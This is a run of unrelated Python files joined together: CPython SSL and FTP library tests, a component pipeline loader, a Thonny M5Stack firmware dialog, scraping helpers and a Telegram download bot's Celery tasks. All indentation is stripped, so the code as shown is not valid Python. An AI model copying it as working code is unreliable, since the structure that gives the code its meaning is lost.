context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with socket.socket() as sock:
s = context.wrap_socket(sock)
with self.assertRaises((OSError, ssl.SSLError)):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
for filename in [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info and support.is_resource_enabled('network'):
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
pipeline.py | """
pipeline.py
"""
from os import walk
from re import search
from importlib import import_module
from multiprocessing import Process
from pydoc import locate
from lxml import etree
class Pipeline(object):
"""
pipeline class
"""
def __init__(self, log_server, file_name):
super(Pipeline, self).__init__()
self.log_server = log_server
self.file_name = file_name
def run(self):
"""
startup method
"""
# read xml file
pipeline = etree.parse(self.file_name, \
etree.XMLParser \
(schema=etree.XMLSchema(etree.XML(open('core/pipeline.xsd', 'r').read()))))
components = []
# dynamically load components
for component in pipeline.xpath('component'):
# get component class
for root, _, files in walk('components'):
for file in files:
if search('.py$', file) and component.xpath('name')[0].text in file:
class_path = root.replace('/', '.').replace('\\', '.') \
+ '.' + file.replace('.py', '')
component_class = getattr(import_module(class_path), component.xpath('class')[0].text)
# instantiate class
components.append(component_class(self.read_options(component)))
# glue components together which aren't disabled with autoglue
for index, component in enumerate(components):
if index + 1 < len(components) and components[index + 1].auto_glue:
component.output_notifier.add_observer(components[index + 1].input_observer)
# add additional components to component
for component in components:
if component.additional_components:
for additional_component in component.additional_components:
for b_comp in components:
if b_comp.component_id == additional_component['additional_component_id']:
notifier = getattr(b_comp, additional_component['notifier'])
notifier.add_observer(component.input_observer)
# start at component
process = Process(target=components[0].start)
process.start()
def read_options(self, component):
"""
read options from xml
"""
options = dict()
options['log_server'] = self.log_server
# read id value
component_id = component.xpath('id')
if component_id:
options['component_id'] = component.xpath('id')[0].text
else:
options['component_id'] = None
# read autoglue value
options['auto_glue'] = component.xpath('autoglue')
if options['auto_glue']:
options['auto_glue'] = component.xpath('autoglue')[0].text
if options['auto_glue'] == 'true':
options['auto_glue'] = True
elif options['auto_glue'] == 'false':
options['auto_glue'] = False
else:
options['auto_glue'] = True
# read properties
options['properties'] = dict()
for component_property in component.xpath('property'):
property_value = component_property.xpath('value')[0]
property_value_type = component_property.xpath('value/@type')
# typecast components
if property_value_type:
property_type = locate(property_value_type[0])
property_value = property_type(property_value.text)
else:
property_value = property_value.text
options['properties'][component_property.xpath('name')[0].text] = property_value
# read additional_component
options['additional_components'] = []
for additional_component in component.xpath('additional_component'):
component_id = additional_component.xpath('id')[0].text
# by convention notifiers has to end with _notifier
if additional_component.xpath('notifier'):
notifier = additional_component.xpath('notifier')[0].text + "_notifier"
else:
notifier = "output" + "_notifier"
options['additional_components'].append(dict(additional_component_id=component_id, \
notifier=notifier))
return options
|
__init__.py | from thonny.plugins.micropython import MicroPythonProxy, MicroPythonConfigPage,\
add_micropython_backend
from thonny import get_workbench, get_runner, ui_utils
import os
import subprocess
import tkinter as tk
from tkinter import ttk
from urllib.request import urlopen
from thonny.ui_utils import SubprocessDialog
from thonny.running import get_interpreter_for_subprocess
from time import sleep
import json
import threading
INDEX_BASE_URL = "https://thonny.org/m5stack/firmwares"
class M5StackProxy(MicroPythonProxy):
pass
class M5StackConfigPage(MicroPythonConfigPage):
def _get_usb_driver_url(self):
return "https://docs.m5stack.com/#/en/related_documents/establish_serial_connection"
class M5Burner(tk.Toplevel):
def __init__(self, master):
tk.Toplevel.__init__(self, master)
self._firmware_infos = {}
self.title("M5Burner")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
main_frame = ttk.Frame(self)
main_frame.grid(row=0, column=0, sticky=tk.NSEW, ipadx=15, ipady=15)
ttk.Label(main_frame, text="Baud rate").grid(row=1, column=0, padx=(15,5), pady=(15,5))
self.baud_combo = ttk.Combobox(main_frame,
exportselection=False,
state="readonly",
values = ["a", "b", "c"])
self.baud_combo.grid(row=1, column=1, columnspan=2, padx=(5,15), pady=(15,5))
ttk.Label(main_frame, text="Firmware").grid(row=2, column=0, padx=(15,5), pady=5)
self.firmware_combo = ttk.Combobox(main_frame,
exportselection=False,
state="readonly",
values=[],
height=15)
self.firmware_combo.grid(row=2, column=1, columnspan=2, padx=(5,15), pady=5)
threading.Thread(target=self._download_infos, daemon=True).start()
self._update_state()
def _download_infos(self):
url = INDEX_BASE_URL + "/firmware.json"
with urlopen(url) as f:
data = json.load(f)
infos = {}
for spec in data:
infos[spec["name"]] = spec
self._firmware_infos = infos
def _update_state(self):
if self._firmware_infos:
option_values = self.firmware_combo.cget("values")
if not option_values:
print(self._firmware_infos)
option_values = list(sorted(self._firmware_infos.keys()))
self.firmware_combo.configure(values=option_values)
self.after(300, self._update_state)
def load_plugin():
add_micropython_backend("M5Stack", M5StackProxy, "MicroPython on M5Stack", M5StackConfigPage)
def open_m5burner():
dlg = M5Burner(get_workbench())
ui_utils.show_dialog(dlg)
get_workbench().add_command("m5burner", "device", "Open M5Burner...",
open_m5burner,
group=40)
|
utils.py | import requests
import ConfigParser
from bs4 import BeautifulSoup
from time import sleep
from clint.textui import progress
import os, sys, itertools
from threading import Thread
from logs import *
def ip_address():
"""
Gets current IP address
"""
response = requests.get('http://www.ip-addr.es')
print '[-] GET {0} | {1}'.format(response.status_code, response.url)
log_info('[+] ip address is: {0}'.format(response.text.strip()))
def config_file(path):
"""
Reads configuration file
"""
if not os.path.exists(path):
raise IOError('file not found!')
log_info('[+] configuration file: {0}'.format(path))
config = ConfigParser.ConfigParser()
config.read(path)
return config
def make_soup(response, debug=False):
"""
Makes soup from response
"""
print '[*] fetching url... {0} | {1}'.format(response.status_code, response.url)
soup = BeautifulSoup(response.text, from_encoding=response.encoding)
if debug:
print soup.prettify().encode('utf-8')
return soup
def wait(delay):
if delay > 0:
print '[-] going to sleep {0} seconds'.format(delay)
sleep(delay)
def download_file(r, url, directory, filename):
"""
Downloads file with progress bar
"""
if not os.path.exists(directory):
# creates directories recursively
os.makedirs(directory)
log_info('[+] created new directory: ' + directory)
path = os.path.join(directory, filename)
print '[-] downloading file from url: {0}'.format(url)
response = r.get(url, stream=True)
with open(path, 'wb') as f:
total_length = int(response.headers.get('content-length'))
for chunk in progress.bar(response.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):
if chunk:
f.write(chunk)
f.flush()
log_success('[+] new download: {0}'.format(path))
return path
def thread_loader(function):
"""
Starts a thread with loading bar
"""
thread = Thread(target=function)
thread.start()
spinner = itertools.cycle(['-', '/', '|', '\\'])
while thread.is_alive():
sys.stdout.write(spinner.next())
sys.stdout.flush()
# erase the last written char
sys.stdout.write('\b')
|
tasks.py | #!/usr/local/bin/python3
# coding: utf-8
# ytdlbot - tasks.py
# 12/29/21 14:57
#
__author__ = "Benny <benny.think@gmail.com>"
import json
import logging
import os
import pathlib
import re
import subprocess
import tempfile
import threading
import time
from urllib.parse import quote_plus
import psutil
import requests
from apscheduler.schedulers.background import BackgroundScheduler
from celery import Celery
from celery.worker.control import Panel
from pyrogram import idle
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from requests_toolbelt.multipart.encoder import MultipartEncoder
from client_init import create_app
from config import (ARCHIVE_ID, AUDIO_FORMAT, BROKER, ENABLE_CELERY,
ENABLE_VIP, TG_MAX_SIZE, WORKERS)
from constant import BotText
from db import Redis
from downloader import (edit_text, sizeof_fmt, tqdm_progress, upload_hook,
ytdl_download)
from limit import VIP
from utils import (apply_log_formatter, auto_restart, customize_logger,
get_metadata, get_revision, get_user_settings)
customize_logger(["pyrogram.client", "pyrogram.session.session", "pyrogram.connection.connection"])
apply_log_formatter()
bot_text = BotText()
logging.getLogger('apscheduler.executors.default').propagate = False
# celery -A tasks worker --loglevel=info --pool=solo
# app = Celery('celery', broker=BROKER, accept_content=['pickle'], task_serializer='pickle')
app = Celery('tasks', broker=BROKER)
celery_client = create_app(":memory:")
def get_messages(chat_id, message_id):
try:
return celery_client.get_messages(chat_id, message_id)
except ConnectionError as e:
logging.critical("WTH!!! %s", e)
celery_client.start()
return celery_client.get_messages(chat_id, message_id)
@app.task()
def ytdl_download_task(chat_id, message_id, url):
logging.info("YouTube celery tasks started for %s", url)
bot_msg = get_messages(chat_id, message_id)
ytdl_normal_download(bot_msg, celery_client, url)
logging.info("YouTube celery tasks ended.")
@app.task()
def audio_task(chat_id, message_id):
logging.info("Audio celery tasks started for %s-%s", chat_id, message_id)
bot_msg = get_messages(chat_id, message_id)
normal_audio(bot_msg, celery_client)
logging.info("Audio celery tasks ended.")
def get_unique_clink(clink, settings):
try:
unique = "{}?p={}{}".format(clink, *settings[1:])
except IndexError:
unique = clink
return unique
@app.task()
def direct_download_task(chat_id, message_id, url):
logging.info("Direct download celery tasks started for %s", url)
bot_msg = get_messages(chat_id, message_id)
direct_normal_download(bot_msg, celery_client, url)
logging.info("Direct download celery tasks ended.")
def forward_video(chat_id, url, client):
red = Redis()
vip = VIP()
settings = get_user_settings(str(chat_id))
clink = vip.extract_canonical_link(url)
unique = get_unique_clink(clink, settings)
cache = red.get_send_cache(unique)
if not cache:
return False
for uid, mid in cache.items():
uid, mid = int(uid), json.loads(mid)
try:
fwd_msg = client.forward_messages(chat_id, uid, mid)
if not fwd_msg:
raise ValueError("Failed to forward message")
red.update_metrics("cache_hit")
if not isinstance(fwd_msg, list):
fwd_msg = [fwd_msg]
for fwd in fwd_msg:
if ENABLE_VIP:
file_size = getattr(fwd.document, "file_size", None) or getattr(fwd.video, "file_size", 1024)
# TODO: forward file size may exceed the limit
vip.use_quota(chat_id, file_size)
red.add_send_cache(unique, chat_id, fwd.message_id)
return True
except Exception as e:
logging.error("Failed to forward message %s", e)
red.del_send_cache(unique, uid)
red.update_metrics("cache_miss")
def ytdl_download_entrance(bot_msg, client, url):
chat_id = bot_msg.chat.id
if forward_video(chat_id, url, client):
return
mode = get_user_settings(str(chat_id))[-1]
if ENABLE_CELERY and mode in [None, "Celery"]:
ytdl_download_task.delay(chat_id, bot_msg.message_id, url)
else:
ytdl_normal_download(bot_msg, client, url)
def direct_download_entrance(bot_msg, client, url):
if ENABLE_CELERY:
# TODO disable it for now
direct_normal_download(bot_msg, client, url)
# direct_download_task.delay(bot_msg.chat.id, bot_msg.message_id, url)
else:
direct_normal_download(bot_msg, client, url)
def audio_entrance(bot_msg, client):
if ENABLE_CELERY:
audio_task.delay(bot_msg.chat.id, bot_msg.message_id)
else:
normal_audio(bot_msg, client)
def direct_normal_download(bot_msg, client, url):
chat_id = bot_msg.chat.id
headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"}
vip = VIP()
length = 0
if ENABLE_VIP:
remain, _, _ = vip.check_remaining_quota(chat_id)
try:
head_req = requests.head(url, headers=headers)
length = int(head_req.headers.get("content-length"))
except (TypeError, requests.exceptions.RequestException):
length = 0
if remain < length:
bot_msg.reply_text(f"Sorry, you have reached your quota.\n")
return
req = None
try:
req = requests.get(url, headers=headers, stream=True)
length = int(req.headers.get("content-length"))
filename = re.findall("filename=(.+)", req.headers.get("content-disposition"))[0]
except TypeError:
filename = getattr(req, "url", "").rsplit("/")[-1]
except Exception as e:
bot_msg.edit_text(f"Download failed!❌\n\n```{e}```", disable_web_page_preview=True)
return
if not filename:
filename = quote_plus(url)
with tempfile.TemporaryDirectory() as f:
filepath = f"{f}/{filename}"
# consume the req.content
downloaded = 0
for chunk in req.iter_content(1024 * 1024):
text = tqdm_progress("Downloading...", length, downloaded)
edit_text(bot_msg, text)
with open(filepath, "ab") as fp:
fp.write(chunk)
downloaded += len(chunk)
logging.info("Downloaded file %s", filename)
st_size = os.stat(filepath).st_size
if ENABLE_VIP:
vip.use_quota(chat_id, st_size)
client.send_chat_action(chat_id, "upload_document")
client.send_document(bot_msg.chat.id, filepath,
caption=f"filesize: {sizeof_fmt(st_size)}",
progress=upload_hook, progress_args=(bot_msg,),
)
bot_msg.edit_text(f"Download success!✅")
def normal_audio(bot_msg, client):
chat_id = bot_msg.chat.id
fn = getattr(bot_msg.video, "file_name", None) or getattr(bot_msg.document, "file_name", None)
with tempfile.TemporaryDirectory() as tmp:
logging.info("downloading to %s", tmp)
base_path = pathlib.Path(tmp)
video_path = base_path.joinpath(fn)
audio = base_path.joinpath(fn).with_suffix(f".{AUDIO_FORMAT}")
client.send_chat_action(chat_id, 'record_video_note')
client.download_media(bot_msg, video_path)
logging.info("downloading complete %s", video_path)
# execute ffmpeg
client.send_chat_action(chat_id, 'record_audio')
try:
subprocess.check_output(["ffmpeg", "-y", "-i", video_path, "-vn", "-acodec", "copy", audio])
except subprocess.CalledProcessError:
# CPU consuming if re-encoding.
subprocess.check_output(["ffmpeg", "-y", "-i", video_path, audio])
client.send_chat_action(chat_id, 'upload_audio')
client.send_audio(chat_id, audio)
Redis().update_metrics("audio_success")
def get_dl_source():
worker_name = os.getenv("WORKER_NAME")
if worker_name:
return f"Downloaded by {worker_name}"
return ""
def upload_transfer_sh(paths: list) -> "str":
d = {p.name: (p.name, p.open("rb")) for p in paths}
m = MultipartEncoder(fields=d)
headers = {'Content-Type': m.content_type}
try:
req = requests.post("https://transfer.sh", data=m, headers=headers)
return re.sub(r"https://", "\nhttps://", req.text)
except requests.exceptions.RequestException as e:
return f"Upload failed!❌\n\n```{e}```"
def ytdl_normal_download(bot_msg, client, url):
chat_id = bot_msg.chat.id
temp_dir = tempfile.TemporaryDirectory()
red = Redis()
result = ytdl_download(url, temp_dir.name, bot_msg)
logging.info("Download complete.")
markup = InlineKeyboardMarkup(
[
[ # First row
InlineKeyboardButton( # Generates a callback query when pressed
f"convert to audio({AUDIO_FORMAT})",
callback_data="convert"
)
]
]
)
if result["status"]:
client.send_chat_action(chat_id, 'upload_document')
video_paths = result["filepath"]
bot_msg.edit_text('Download complete. Sending now...')
for video_path in video_paths:
# normally there's only one video in that path...
filename = video_path.name
remain = bot_text.remaining_quota_caption(chat_id)
st_size = os.stat(video_path).st_size
size = sizeof_fmt(st_size)
if st_size > TG_MAX_SIZE:
t = f"Your video size is {size} which is too large for Telegram. I'll upload it to transfer.sh"
bot_msg.edit_text(t)
client.send_chat_action(chat_id, 'upload_document')
client.send_message(chat_id, upload_transfer_sh(video_paths))
return
meta = get_metadata(video_path)
worker = get_dl_source()
cap = f"`{filename}`\n\n{url}\n\nInfo: {meta['width']}x{meta['height']} {size} {meta['duration']}s" \
f"\n{remain}\n{worker}"
settings = get_user_settings(str(chat_id))
if ARCHIVE_ID:
chat_id = ARCHIVE_ID
if settings[2] == "document":
logging.info("Sending as document")
res_msg = client.send_document(chat_id, video_path,
caption=cap,
progress=upload_hook, progress_args=(bot_msg,),
reply_markup=markup,
thumb=meta["thumb"]
)
elif settings[2] == "audio":
logging.info("Sending as audio")
res_msg = client.send_audio(chat_id, video_path,
caption=cap,
progress=upload_hook, progress_args=(bot_msg,),
)
else:
logging.info("Sending as video")
res_msg = client.send_video(chat_id, video_path,
supports_streaming=True,
caption=cap,
progress=upload_hook, progress_args=(bot_msg,),
reply_markup=markup,
**meta
)
clink = VIP().extract_canonical_link(url)
unique = get_unique_clink(clink, settings)
red.add_send_cache(unique, res_msg.chat.id, res_msg.message_id)
red.update_metrics("video_success")
if ARCHIVE_ID:
client.forward_messages(bot_msg.chat.id, ARCHIVE_ID, res_msg.message_id)
bot_msg.edit_text('Download success!✅')
else:
client.send_chat_action(chat_id, 'typing')
tb = result["error"][0:4000]
bot_msg.edit_text(f"Download failed!❌\n\n```{tb}```", disable_web_page_preview=True)
temp_dir.cleanup()
@Panel.register
def ping_revision(*args):
return get_revision()
@Panel.register
def hot_patch(*args):
app_path = pathlib.Path().cwd().parent
logging.info("Hot patching on path %s...", app_path)
apk_install = "xargs apk add < apk.txt"
pip_install = "pip install -r requirements.txt"
unset = "git config --unset http.https://github.com/.extraheader"
pull_unshallow = "git pull origin --unshallow"
pull = "git pull"
subprocess.call(unset, shell=True, cwd=app_path)
if subprocess.call(pull_unshallow, shell=True, cwd=app_path) != 0:
logging.info("Already unshallow, pulling now...")
subprocess.call(pull, shell=True, cwd=app_path)
logging.info("Code is updated, applying hot patch now...")
subprocess.call(apk_install, shell=True, cwd=app_path)
subprocess.call(pip_install, shell=True, cwd=app_path)
psutil.Process().kill()
def run_celery():
argv = [
"-A", "tasks", 'worker', '--loglevel=info',
"--pool=threads", f"--concurrency={WORKERS}",
"-n", os.getenv("WORKER_NAME", "")
]
app.worker_main(argv)
if __name__ == '__main__':
celery_client.start()
print("Bootstrapping Celery worker now.....")
time.sleep(5)
threading.Thread(target=run_celery, daemon=True).start()
scheduler = BackgroundScheduler(timezone="Asia/Shanghai")
scheduler.add_job(auto_restart, 'interval', seconds=5)
scheduler.start()
idle()
celery_client.stop()
|
test_ftplib.py | """Test script for ftplib module."""
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
TIMEOUT = 3
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = (
'type=cdir;perm=el;unique==keVO1+ZF4; test\r\ntype=pdir;perm=e;unique==keVO1+d?3; ..\r\ntype=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\ntype=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\ntype=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\ntype=file;perm=awr;unique==keVO1+8G4; writable\r\ntype=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\ntype=dir;perm=;unique==keVO1+1t2; no-exec\r\ntype=file;perm=r;unique==keVO1+EG4; two words\r\ntype=file;perm=r;unique==keVO1+IH4; leading space\r\ntype=file;perm=r;unique==keVO1+1G4; file1\r\ntype=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\ntype=file;perm=r;unique==keVO1+1G4; file2\r\ntype=file;perm=r;unique==keVO1+1G4; file3\r\ntype=file;perm=r;unique==keVO1+1G4; file4\r\n'
)
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b'\r\n')
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ''
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' % cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' % tuple(addr[:4])
port = addr[4] * 256 + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ',')
p1 = port / 256
p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' % (ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' % port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' % arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), 'keycert3.pem')
CAFILE = os.path.join(os.path.dirname(__file__), 'pycacert.pem')
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
socket = context.wrap_socket(self.socket, suppress_ragged_eofs=
False, server_side=True, do_handshake_on_connect=False)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.
SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.
SSL_ERROR_WANT_WRITE):
return
except OSError as err:
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.
SSL_ERROR_ZERO_RETURN, ssl.SSL_ERROR_WANT_READ, ssl.
SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.
SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN
):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if isinstance(self.socket, ssl.SSLSocket
) and self.socket._sslobj is not None:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push('502 Unrecognized PROT type (use C or P).')
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****')
)
